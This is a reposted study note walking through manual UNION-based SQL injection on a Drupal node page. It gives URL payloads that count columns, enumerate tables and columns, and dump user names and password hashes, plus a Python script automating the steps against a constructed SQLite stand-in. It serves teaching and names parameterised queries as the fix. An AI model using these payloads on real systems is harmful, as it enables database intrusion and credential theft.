Drupal manual SQL injection review

Determine the number of columns

?nid=1 order by 1 --+      no error
?nid=1 order by N --+      raise N until the page errors; the largest N that does not error is the column count (--+ decodes to "-- ", which comments out the rest of the original query)

The notes state that the program's SQL statement has two columns. Note, however, that every UNION SELECT below supplies a single column: a UNION only succeeds when both sides select the same number of columns, so if the ORDER BY test gives two, pad the payload with numbers (union select expr,2) instead of trusting the note.

Determine the display position

?nid=0 union select 1      nid=0 matches no row, so the page renders the UNION row; a number in each column shows which columns are displayed

Database name

?nid=0 union select database()

Database version

?nid=0 union select version()

List table names

?nid=0 union select table_name from information_schema.tables where table_schema=database()        one row per table, but the page normally renders only the first row

?nid=0 union select group_concat(table_name) from information_schema.tables where table_schema=database()      use group_concat to join all the names into one string so they fit in a single displayed row

?nid=0 union select table_name from information_schema.tables where table_schema=database() limit 0,1
?nid=0 union select table_name from information_schema.tables where table_schema=database() limit 1,1    use limit to walk through the table names one at a time

List the columns of the users table

?nid=0 union select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()

Dump the column contents

?nid=0  union select group_concat(name) from users 
?nid=0  union select group_concat(pass) from users 
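The whole procedure above (count columns with ORDER BY, find the displayed column with nid=0 UNION markers, then enumerate tables, columns and rows) automated against a constructed stand-in for the injectable page. This is an added example, not the original notes' code nor Drupal's: the stand-in query, tables, user rows and hashes are invented, SQLite replaces MySQL (so information_schema.tables becomes sqlite_master and information_schema.columns becomes pragma_table_info(); database() and version() have no counterpart here), and the stand-in query is given two columns to show how the UNION payloads are padded to match.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the vulnerable page (not Drupal's code). The node query
# has two columns and the nid parameter is concatenated into the SQL unquoted.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE node (nid INTEGER, title TEXT, body TEXT);
        INSERT INTO node VALUES (1, 'Hello world', 'first body'), (2, 'Second', 'second body');
        CREATE TABLE users (uid INTEGER, name TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'admin', '$S$hash1'), (2, 'bob', '$S$hash2');
    """)
    return con

def vulnerable_page(con, nid_param):
    """The injectable query. Returns ('error', message) or ('ok', [title, ...]);
    like a node listing, the page renders only the first selected column."""
    nid = unquote_plus(nid_param)            # '--+' in the URL becomes '-- '
    sql = f"SELECT title, body FROM node WHERE nid = {nid}"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", [row[0] for row in rows])

def find_column_count(page, max_cols=20):
    """ORDER BY n: the largest n that does not error is the column count."""
    count = 0
    for n in range(1, max_cols + 1):
        status, _ = page(f"1 order by {n} --+")
        if status == "error":
            break
        count = n
    return count

def pad(expr, ncols):
    """Fill the remaining UNION columns with numbers so both sides match."""
    return ", ".join([expr] + [str(i) for i in range(2, ncols + 1)])

def find_display_positions(page, ncols):
    """nid=0 empties the original result; marker strings show which UNION columns are rendered."""
    markers = ", ".join(f"'pos{i}'" for i in range(1, ncols + 1))
    status, out = page(f"0 union select {markers}")
    if status != "ok":
        raise RuntimeError(out)
    return [i for i in range(1, ncols + 1) if f"pos{i}" in out]

def extract(page, ncols, expr, from_clause=""):
    """Place the expression in the first (rendered) column and read it back."""
    status, out = page(f"0 union select {pad(expr, ncols)} {from_clause}")
    return out[0] if status == "ok" and out else None

def run_walkthrough():
    con = build_db()
    page = lambda p: vulnerable_page(con, p)
    ncols = find_column_count(page)
    return {
        "columns_in_query": ncols,
        "displayed": find_display_positions(page, ncols),
        # SQLite stand-ins for the information_schema queries in the notes
        "tables": extract(page, ncols, "group_concat(name)", "from sqlite_master where type='table'"),
        "users_columns": extract(page, ncols, "group_concat(name)", "from pragma_table_info('users')"),
        "names": extract(page, ncols, "group_concat(name)", "from users"),
        "hashes": extract(page, ncols, "group_concat(pass)", "from users"),
    }

if __name__ == "__main__":
    for key, value in run_walkthrough().items():
        print(f"{key}: {value}")
```

Sending `1 union select 1` against this two-column stand-in fails with a column-count mismatch, which is exactly why the ORDER BY step comes first; the fix on the application side is a parameterised query, which never lets `nid` reach the SQL parser as syntax.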


Reposted from blog.csdn.net/qq_42094992/article/details/109104797